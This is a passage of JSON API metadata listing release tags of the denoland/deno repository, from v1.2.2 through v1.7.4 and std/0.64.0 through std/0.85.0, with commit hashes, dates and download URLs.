7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc